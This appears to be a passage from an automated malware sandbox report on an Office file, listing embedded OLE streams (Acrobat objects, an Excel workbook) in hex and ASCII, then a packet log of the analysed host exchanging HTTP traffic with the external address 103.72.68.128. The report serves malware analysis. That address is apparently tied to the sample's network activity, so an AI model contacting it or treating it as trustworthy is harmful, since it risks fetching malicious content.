Data Raw:	50 4b 03 04 14 00 06 00 08 00 00 00 21 00 58 56 c6 8f 60 01 00 00 18 05 00 00 13 00 da 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d6 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD0010AD53/\x1CompObj, File Type: data, Stream Size: 93

General
Stream Path:	MBD0010AD53/\x1CompObj
CLSID:
File Type:	data
Stream Size:	93
Entropy:	4.2892020709435155
Base64 Encoded:	False
Data ASCII:	. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o b a t . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 14 00 00 00 41 63 72 6f 62 61 74 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD0010AD53/\x1Ole, File Type: data, Stream Size: 64

General
Stream Path:	MBD0010AD53/\x1Ole
CLSID:
File Type:	data
Stream Size:	64
Entropy:	2.892622069467395
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . . . . . . F . . . . ! . . . . . S h e e t 1 ! O b j e c t 6 9 1 .
Data Raw:	01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 30 00 00 00 04 03 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 02 00 00 00 21 00 12 00 00 00 53 68 65 65 74 31 21 4f 62 6a 65 63 74 20 36 39 31 00

Stream Path: MBD0010AD53/CONTENTS, File Type: PDF document, version 1.4, 1 pages, Stream Size: 124841

General
Stream Path:	MBD0010AD53/CONTENTS
CLSID:
File Type:	PDF document, version 1.4, 1 pages
Stream Size:	124841
Entropy:	7.657052848938946
Base64 Encoded:	True
Data ASCII:	% P D F - 1 . 4 . . % . . % . . % w P D F b y W P C u b e d G m b H V 3 . 5 4 x [ 0 ] . . % . . % . . 1 0 o b j . < < / T y p e / M e t a d a t a / S u b t y p e / X M L / L e n g t h 1 4 4 7 > > . . s t r e a m . < ? x p a c k e t b e g i n = " . " i d = " W 5 M 0 M p C e h i H z r e S z N T c z k c 9 d " ? > . < x : x m p m e t a x m l n s : x = " a d o b e : n s : m e t a / " x : x m p t k = " 3 . 1 - 7 0 1 " > . < r d f : R D F x m l n s : r d f = " h t t p : / / w w w . w 3 .
Data Raw:	25 50 44 46 2d 31 2e 34 0d 0a 25 e2 e3 cf d3 0d 0a 25 0d 0a 25 77 50 44 46 20 62 79 20 57 50 43 75 62 65 64 20 47 6d 62 48 20 56 33 2e 35 34 78 5b 30 5d 0d 0a 25 0d 0a 25 0d 0a 31 20 30 20 6f 62 6a 0d 3c 3c 2f 54 79 70 65 2f 4d 65 74 61 64 61 74 61 2f 53 75 62 74 79 70 65 2f 58 4d 4c 2f 4c 65 6e 67 74 68 20 31 34 34 37 20 3e 3e 0d 0a 73 74 72 65 61 6d 0a 3c 3f 78 70 61 63 6b 65 74

Stream Path: MBD0010AD54/\x1CompObj, File Type: data, Stream Size: 93

General
Stream Path:	MBD0010AD54/\x1CompObj
CLSID:
File Type:	data
Stream Size:	93
Entropy:	4.2892020709435155
Base64 Encoded:	False
Data ASCII:	. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o b a t . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 14 00 00 00 41 63 72 6f 62 61 74 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD0010AD54/\x1Ole, File Type: data, Stream Size: 64

General
Stream Path:	MBD0010AD54/\x1Ole
CLSID:
File Type:	data
Stream Size:	64
Entropy:	2.892622069467395
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . . . . . . F . . . . ! . . . . . S h e e t 1 ! O b j e c t 6 9 0 .
Data Raw:	01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 30 00 00 00 04 03 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 02 00 00 00 21 00 12 00 00 00 53 68 65 65 74 31 21 4f 62 6a 65 63 74 20 36 39 30 00

Stream Path: MBD0010AD54/CONTENTS, File Type: PDF document, version 1.5, Stream Size: 66661

General
Stream Path:	MBD0010AD54/CONTENTS
CLSID:
File Type:	PDF document, version 1.5
Stream Size:	66661
Entropy:	7.946317330962055
Base64 Encoded:	True
Data ASCII:	% P D F - 1 . 5 . % . 2 0 o b j . < < . / P a g e s 4 0 R . / T y p e / C a t a l o g . / O u t p u t I n t e n t s 5 0 R . / M e t a d a t a 6 0 R . / A c r o F o r m 7 0 R . / V e r s i o n / 1 # 2 E 5 . > > . e n d o b j . 6 0 o b j . < < . / T y p e / M e t a d a t a . / S u b t y p e / X M L . / F i l t e r / F l a t e D e c o d e . / L e n g t h 4 5 4 . > > . s t r e a m . . x n 0 . . S X . 6 _ Q . U 4 : m Q . # c . . W M X T . . H > > . } \| . l . M . / . T
Data Raw:	25 50 44 46 2d 31 2e 35 0a 25 a7 e3 f1 f1 0a 32 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 50 61 67 65 73 20 34 20 30 20 52 0a 2f 54 79 70 65 20 2f 43 61 74 61 6c 6f 67 0a 2f 4f 75 74 70 75 74 49 6e 74 65 6e 74 73 20 35 20 30 20 52 0a 2f 4d 65 74 61 64 61 74 61 20 36 20 30 20 52 0a 2f 41 63 72 6f 46 6f 72 6d 20 37 20 30 20 52 0a 2f 56 65 72 73 69 6f 6e 20 2f 31 23 32 45 35 0a 3e 3e 0a 65 6e

Stream Path: MBD0010AD55/\x1CompObj, File Type: data, Stream Size: 114

General
Stream Path:	MBD0010AD55/\x1CompObj
CLSID:
File Type:	data
Stream Size:	114
Entropy:	4.25248375192737
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD0010AD55/\x5DocumentSummaryInformation, File Type: data, Stream Size: 708

General
Stream Path:	MBD0010AD55/\x5DocumentSummaryInformation
CLSID:
File Type:	data
Stream Size:	708
Entropy:	3.6235698530352805
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , D . . . . . . . . . . + , . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 44 00 00 00 05 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 20 02 00 00 dc 01 00 00 14 00 00 00 01 00 00 00 a8 00 00 00 02 00 00 00 b0 00 00 00 03 00 00 00 bc 00 00 00 0e 00 00 00 c8 00 00 00 0f 00 00 00 d4 00 00 00 04 00 00 00 e0 00 00 00 05 00 00 00

Stream Path: MBD0010AD55/\x5SummaryInformation, File Type: data, Stream Size: 372

General
Stream Path:	MBD0010AD55/\x5SummaryInformation
CLSID:
File Type:	data
Stream Size:	372
Entropy:	2.8705886273301635
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . D . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . , . . . . . . . 4 . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . v i v i e n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 1
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 44 01 00 00 10 00 00 00 01 00 00 00 88 00 00 00 02 00 00 00 90 00 00 00 03 00 00 00 9c 00 00 00 04 00 00 00 a8 00 00 00 05 00 00 00 b8 00 00 00 06 00 00 00 c4 00 00 00 07 00 00 00 d0 00 00 00 08 00 00 00 dc 00 00 00 09 00 00 00 ec 00 00 00

Stream Path: MBD0010AD55/Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 97808

General
Stream Path:	MBD0010AD55/Workbook
CLSID:
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	97808
Entropy:	7.365106814876281
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . 9 1 9 7 4 B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . P . 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . . . . .
Data Raw:	09 08 10 00 00 06 05 00 aa 1f cd 07 c9 00 02 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 39 31 39 37 34 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 16, 2023 09:58:23.773436069 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:24.131184101 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:24.131361961 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:24.132147074 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:24.491461992 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:24.491503954 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:24.491516113 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:24.491529942 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:24.491694927 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:24.491694927 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:24.849540949 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:24.849586964 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:24.849627972 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:24.849685907 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:24.849724054 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:24.849895954 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:24.849910021 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:24.849924088 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:24.849931002 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:24.849931955 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:24.849953890 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:24.849978924 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.207694054 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.207711935 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.207787991 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.207928896 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.207928896 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.207967043 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.207969904 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.207993984 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.208018064 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.208061934 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.208112955 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.208120108 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.208234072 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.209842920 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.209857941 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.209871054 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.209883928 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.209897041 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.209908962 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.209913015 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.209923029 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.209928036 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.209934950 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.209947109 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.209953070 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.209964037 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.209969997 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.209991932 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.210006952 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.210158110 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.566236973 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.566266060 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.566282988 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.566314936 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.566338062 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.566374063 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.566387892 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.566438913 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.566469908 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.566488028 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.566514015 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.566514969 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.566529036 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.566551924 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.566589117 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.566632032 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.566646099 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.566684961 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.566723108 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.566759109 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.566818953 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.566859961 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.566914082 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.566947937 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.566998005 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.567032099 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.567672014 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.567712069 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.567723989 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.567758083 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.567809105 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.567845106 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.567857027 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.567857981 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.567892075 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.567938089 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.567997932 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.568012953 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.568048954 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.568089962 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.568125963 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.568126917 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.568160057 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.568195105 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.568233967 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.568245888 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.568279982 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.568295002 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.568331957 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.568355083 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.568389893 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.568398952 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.568433046 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.568483114 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.568510056 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.568516970 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.568540096 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.568623066 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.568659067 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.568660021 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.568691015 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.568723917 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.568746090 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.568759918 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.569295883 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.924134016 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.924161911 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.924254894 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.924254894 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.924308062 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.924344063 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.924391031 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.924426079 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.924453974 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.924468994 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.924499989 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.924510956 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.924555063 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.924556971 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.924596071 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.924657106 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.924695015 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.924700975 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.924740076 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.924756050 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.924793005 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.924853086 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.924891949 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.924892902 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.924930096 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.924963951 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.925003052 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.925007105 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.925044060 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.925059080 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.925096989 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.925111055 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.925148010 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.925156116 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.925193071 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.925223112 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.925260067 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.925463915 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.925493956 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.925504923 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.925529957 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.925570011 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.925600052 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.925610065 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.925637960 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.925652027 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.925688982 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.925750017 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.925791025 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.925806046 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.925843000 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.925856113 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.925893068 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.925915956 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.925924063 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.925959110 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.926043034 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.926083088 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.926104069 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.926142931 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.926212072 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.926250935 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.926295042 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.926332951 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.926351070 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.926387072 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.926405907 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.926445007 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.926605940 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.926642895 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.926676035 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.926707029 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.926745892 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.926762104 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.926800966 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.926832914 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.926872015 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.926872969 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.926908970 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.926949978 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.926989079 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.927045107 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.927082062 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.927128077 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.927165985 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.927242041 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.927278996 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.927309036 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.927349091 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.927352905 CEST	49164	80	192.168.2.22	103.72.68.128
